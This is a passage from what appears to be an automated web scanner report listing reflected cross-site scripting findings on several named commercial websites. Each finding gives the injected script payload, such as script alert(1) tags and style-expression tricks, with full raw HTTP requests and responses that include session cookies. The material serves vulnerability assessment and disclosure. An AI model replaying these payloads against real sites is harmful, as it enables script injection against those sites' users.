HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:24:56 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 83315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />



...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=1716003;type=homep425;cat=honep983;u2=1;u3=;u4=;u5=457c8"><script>alert(1)</script>c19fd1e3999;u6=;u7=;ord=1;num=50930345?" width="1" height="1" frameborder="0">
...[SNIP]...

1.34. http://www.modells.com/home/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.modells.com
Path:   /home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762c3"><script>alert(1)</script>145246d861f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.modells.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: 762c3"><script>alert(1)</script>145246d861f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:24:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 83315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />



...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=1716003;type=homep425;cat=honep983;u2=1;u3=;u4=;u5=762c3"><script>alert(1)</script>145246d861f;u6=;u7=;ord=1;num=35434316?" width="1" height="1" frameborder="0">
...[SNIP]...

1.35. http://www.wineenthusiast.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wineenthusiast.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a1fe"-alert(1)-"16dcf6670c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.wineenthusiast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=5a1fe"-alert(1)-"16dcf6670c0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 86449
Content-Type: text/html
Expires: Wed, 28 Sep 2011 13:51:46 GMT
Set-Cookie: tid=; path=/
Set-Cookie: weSource=ZSEOFA11; expires=Sun, 30-Oct-2011 13:51:46 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: SessionStart=TRUE; domain=www.wineenthusiast.com; path=/
Set-Cookie: NCREmail=; domain=www.wineenthusiast.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<title>Wine Accessories, Wine Gifts, Wine Cellars, Wine Racks & Wine Glasses - Wine Enthusiast</title>
<META name
...[SNIP]...
site where the tag is on [required field]
           pulse.setSite("wineenthusiast.com");
           // Referrer page that brought the user to current page
           pulse.set("prf", "http://www.google.com/search?hl=en&q=5a1fe"-alert(1)-"16dcf6670c0");
           // Type of page user is viewing
           pulse.set("pty","hp");
           // If a purchase occurred on this page
           // Value of "0" means it didn.t
           pulse.set("pce","0");
           // List of product ids an
...[SNIP]...

1.36. http://www.wineenthusiast.com/glassware.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wineenthusiast.com
Path:   /glassware.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fa0f"-alert(1)-"7de1b6d3f7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /glassware.asp?icid=HPGLASSWAREASPOT1 HTTP/1.1
Host: www.wineenthusiast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=8fa0f"-alert(1)-"7de1b6d3f7f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NCREmail=; weDefSrcCodeFtrCk=PH6FA11; S7Available=true; SessionStart=TRUE; tid=; WineEnthusiast1=exp=October%252030%252C%25202011%252009%253A50%253A08&uid=1FFA5CFB%2DEB18%2D4464%2D8241%2DB8341DD0881F; ASPSESSIONIDACBRRBSR=ABFBPAIDKDAOLMIIPLFFGJGO; __utma=159606498.2047564591.1317390612.1317390612.1317390612.1; __utmc=159606498; __utmz=159606498.1317390612.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __qca=P0-61425056-1317390618909; s_cc=true; IS2_Rules_6206=9188%600%60/templates/%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60%5E%5E%5E9203%600%60landing.asp%3FN%3D168%600%60%60100%601%60%60%600%60%60%60%602%6060%60%60%601%608228%6022378%605%601%60%60%60%60; IS2_MatchHistory=%20; mbcc=111DAB9B-A587-5575-92D4-CE44C816D484; CVT5kReIUID=edee92e6-dfbf-49f1-9101-53afbe51c7fb; cvo_sid1=SPZW6FZWEK8X; CVTSESSION=B75301826BC7121A27523C99980B222D; IS2_StoredValues=PrevOfferCount%600%2CPrevOfferTime%600%2CLastRuleIDTriggered%600%2CRuleTriggered%600%2CTimeSinceLastCheck%601910; s_sq=wineenthusiastcom%3D%2526pid%253DHome%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.wineenthusiast.com/glassware.asp%25253Ficid%25253DHPGLASSWAREASPOT1%2526ot%253DAREA

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:27:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 109331
Content-Type: text/html
Set-Cookie: LastCatNValViewed=353; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: LastCatViewed=GLASSWARE; expires=Sun, 30-Oct-2011 04:00:00 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: tid=; path=/
Set-Cookie: weSource=ZSEOFA11; expires=Sun, 30-Oct-2011 14:27:36 GMT; domain=www.wineenthusiast.com; path=/
Set-Cookie: SessionStart=TRUE; domain=www.wineenthusiast.com; path=/
Set-Cookie: URLState=http%3A%2F%2Fwww%2Ewineenthusiast%2Ecom%2FE%2Flanding%2Easp%3FN%3D353%26icid%3DHPGLASSWAREASPOT1; domain=www.wineenthusiast.com; path=/
Set-Cookie: NCREmail=; domain=www.wineenthusiast.com; path=/
Cache-control: private


<html>
<head>

<title>Wine Glasses: Crystal Glassware, Stemware & Wine Glass Sets - Wine Enthusiast</title>
<META name="description" content="Wine Glasses from Wine Enthusiast. Find exquisite
...[SNIP]...
site where the tag is on [required field]
           pulse.setSite("wineenthusiast.com");
           // Referrer page that brought the user to current page
           pulse.set("prf", "http://www.google.com/search?hl=en&q=8fa0f"-alert(1)-"7de1b6d3f7f");
           // Type of page user is viewing
           pulse.set("pty","cp");
           // If a purchase occurred on this page
           // Value of "0" means it didn.t
           pulse.set("pce","0");
           // List of product ids an
...[SNIP]...

1.37. http://sp1.convertro.com/trax/hit/wineenthusiast/0/ [cvo_sid1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sp1.convertro.com
Path:   /trax/hit/wineenthusiast/0/

Issue detail

The value of the cvo_sid1 cookie is copied into the HTML document as plain text between tags. The payload 2647d<script>alert(1)</script>0c48ec342c3 was submitted in the cvo_sid1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /trax/hit/wineenthusiast/0/?bts=1317390625348&sid=&mid=&eid=&cid=&jid=&typ=&val=1&isa=&pag=http%3A//www.wineenthusiast.com/&ref=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D10%26c2%3D42&fup=0&new=1&nji=0&sts=1303122170&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Binternal-remoting-viewer%2C%3BppGoogleNaClPluginChrome%2C%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1317390625276&atb=1317390625276&log=0.001%20-%20@%200.002%0A0.069%20-%20i.e%3A%20J%20%0A0.070%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cvo_sid1=SPZW6FZWEK8X2647d<script>alert(1)</script>0c48ec342c3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Date: Fri, 30 Sep 2011 13:51:27 GMT
Etag: 1317390687
Last-Modified: 1317390687
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=SPZW6FZWEK8X2647d%3Cscript%3Ealert%281%29%3C%2Fscript%3E0c48ec342c3; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Vary: Accept-Encoding
X-CVO-RT-NOTICE: ptr-na
Content-Length: 264
Connection: keep-alive

$CVO.push(['setUserSid', 'SPZW6FZWEK8X2647d<script>alert(1)</script>0c48ec342c3']);

if (window.CVO) {
CVO.log("<< H[999999999]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999]");
}
if (window.$CVO.getVersion) {
$CVO.push([ 'trackEventDone', "" ]);
}

1.38. http://sp1.convertro.com/trax/hit/wineenthusiast/1/ [cvo_sid1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sp1.convertro.com
Path:   /trax/hit/wineenthusiast/1/

Issue detail

The value of the cvo_sid1 cookie is copied into the HTML document as plain text between tags. The payload 76c5e<script>alert(1)</script>6fd01531e8c was submitted in the cvo_sid1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /trax/hit/wineenthusiast/1/?bts=1317390610397&sid=&mid=&eid=&cid=&jid=&typ=&val=1&isa=&pag=http%3A//www.wineexpress.com/&ref=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D10%26c2%3D42&fup=0&new=1&nji=0&sts=1303122170&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Binternal-remoting-viewer%2C%3BppGoogleNaClPluginChrome%2C%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1317390610389&atb=1317390610389&log=0.001%20-%20@%200.001%0A0.006%20-%20i.e%3A%20J%20%0A0.007%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cvo_sid1=SPZW6FZWEK8X76c5e<script>alert(1)</script>6fd01531e8c

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Date: Fri, 30 Sep 2011 13:51:12 GMT
Etag: 1317390672
Last-Modified: 1317390672
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=SPZW6FZWEK8X76c5e%3Cscript%3Ealert%281%29%3C%2Fscript%3E6fd01531e8c; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Vary: Accept-Encoding
X-CVO-RT-NOTICE: ptr-na
Content-Length: 264
Connection: keep-alive

$CVO.push(['setUserSid', 'SPZW6FZWEK8X76c5e<script>alert(1)</script>6fd01531e8c']);

if (window.CVO) {
CVO.log("<< H[999999999]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999]");
}
if (window.$CVO.getVersion) {
$CVO.push([ 'trackEventDone', "" ]);
}

1.39. http://www.familysecure.com/Order1.aspx [areaid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familysecure.com
Path:   /Order1.aspx

Issue detail

The value of the areaid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e94f4'style%3d'x%3aexpression(alert(1))'419f28d172f was submitted in the areaid parameter. This input was echoed as e94f4'style='x:expression(alert(1))'419f28d172f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22e94f4'style%3d'x%3aexpression(alert(1))'419f28d172f&pkgid=F1DCN HTTP/1.1
Host: www.familysecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.familysecure.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tif3iu55k3plyd45jwnbiq34; MachineName=IRC-P2WEB-39; OriginalReferrer=mcafeesecure.com; NavigationPath=Default; LastVisitDate=9/30/2011 7:26:36 AM; NavFlowID=; NumTrialDaysLeft=; UID=0175fce1f2474a078df1cb3267f5e2df; BIGipServerfamilysecure-web-pool=176901642.37407.0000

Response

HTTP/1.1 302 Found
Date: Fri, 30 Sep 2011 14:28:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.familysecure.com/Order1.aspx?areaid=22e94f4'style='x:expression(alert(1))'419f28d172f&pkgid=F1DCN
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.familysecure.com/Order1.aspx?areaid=22e94f4'style='x:expression(alert(1))'419f28d172f&amp;pkgid=F1DCN'>he
...[SNIP]...

1.40. http://www.familysecure.com/Order1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familysecure.com
Path:   /Order1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5b438'style%3d'x%3aexpression(alert(1))'9c3d9103f0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b438'style='x:expression(alert(1))'9c3d9103f0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=F1DCN&5b438'style%3d'x%3aexpression(alert(1))'9c3d9103f0c=1 HTTP/1.1
Host: www.familysecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.familysecure.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tif3iu55k3plyd45jwnbiq34; MachineName=IRC-P2WEB-39; OriginalReferrer=mcafeesecure.com; NavigationPath=Default; LastVisitDate=9/30/2011 7:26:36 AM; NavFlowID=; NumTrialDaysLeft=; UID=0175fce1f2474a078df1cb3267f5e2df; BIGipServerfamilysecure-web-pool=176901642.37407.0000

Response

HTTP/1.1 302 Found
Date: Fri, 30 Sep 2011 14:29:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.familysecure.com/Order1.aspx?areaid=22&pkgid=F1DCN&5b438'style='x:expression(alert(1))'9c3d9103f0c=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 237

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.familysecure.com/Order1.aspx?areaid=22&amp;pkgid=F1DCN&amp;5b438'style='x:expression(alert(1))'9c3d9103f0c=1'>
...[SNIP]...

1.41. http://www.familysecure.com/Order1.aspx [pkgid parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familysecure.com
Path:   /Order1.aspx

Issue detail

The value of the pkgid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98a1d'style%3d'x%3aexpression(alert(1))'00f5882e45c was submitted in the pkgid parameter. This input was echoed as 98a1d'style='x:expression(alert(1))'00f5882e45c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Order1.aspx?areaid=22&pkgid=F1DCN98a1d'style%3d'x%3aexpression(alert(1))'00f5882e45c HTTP/1.1
Host: www.familysecure.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.familysecure.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tif3iu55k3plyd45jwnbiq34; MachineName=IRC-P2WEB-39; OriginalReferrer=mcafeesecure.com; NavigationPath=Default; LastVisitDate=9/30/2011 7:26:36 AM; NavFlowID=; NumTrialDaysLeft=; UID=0175fce1f2474a078df1cb3267f5e2df; BIGipServerfamilysecure-web-pool=176901642.37407.0000

Response

HTTP/1.1 302 Found
Date: Fri, 30 Sep 2011 14:29:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.familysecure.com/Order1.aspx?areaid=22&pkgid=F1DCN98a1d'style='x:expression(alert(1))'00f5882e45c
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 230

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.familysecure.com/Order1.aspx?areaid=22&amp;pkgid=F1DCN98a1d'style='x:expression(alert(1))'00f5882e45c'>he
...[SNIP]...

1.42. http://www.surepayroll.com/product/payroll/ [sMkeyword cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surepayroll.com
Path:   /product/payroll/

Issue detail

The value of the sMkeyword cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe3a"><script>alert(1)</script>59f51752f8 was submitted in the sMkeyword cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product/payroll/ HTTP/1.1
Host: www.surepayroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.surepayroll.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sMkeyword=bfe3a"><script>alert(1)</script>59f51752f8; sMsource=http%3A%2F%2Fwww%2Emcafeesecure%2Ecom%2Fus%2Fforconsumers%2Fmcaf; ASPSESSIONIDCASQTBDQ=MJDOJOHAPFPLGMCLDOLAMMKC; __utmx=117341828.00016514002693917061:2:3; __utmxx=117341828.00016514002693917061:1317390646:2592000; __utma=117341828.1933136298.1317390646.1317390646.1317390646.1; __utmb=117341828.3.9.1317390745947; __utmc=117341828; __utmz=117341828.1317390646.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:52:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40772
Content-Type: text/html; Charset=ISO-LATIN-1
Expires: Fri, 30 Sep 2011 13:52:37 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">


...[SNIP]...
<input type="hidden" name="EmployeeType" value="bfe3a"><script>alert(1)</script>59f51752f8" />
...[SNIP]...

1.43. http://www.surepayroll.com/product/payroll/ [sMsource cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.surepayroll.com
Path:   /product/payroll/

Issue detail

The value of the sMsource cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73468"><script>alert(1)</script>2a7514ba6f was submitted in the sMsource cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product/payroll/ HTTP/1.1
Host: www.surepayroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.surepayroll.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sMkeyword=; sMsource=http%3A%2F%2Fwww%2Emcafeesecure%2Ecom%2Fus%2Fforconsumers%2Fmcaf73468"><script>alert(1)</script>2a7514ba6f; ASPSESSIONIDCASQTBDQ=MJDOJOHAPFPLGMCLDOLAMMKC; __utmx=117341828.00016514002693917061:2:3; __utmxx=117341828.00016514002693917061:1317390646:2592000; __utma=117341828.1933136298.1317390646.1317390646.1317390646.1; __utmb=117341828.3.9.1317390745947; __utmc=117341828; __utmz=117341828.1317390646.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:52:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40772
Content-Type: text/html; Charset=ISO-LATIN-1
Expires: Fri, 30 Sep 2011 13:52:37 GMT
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">


...[SNIP]...
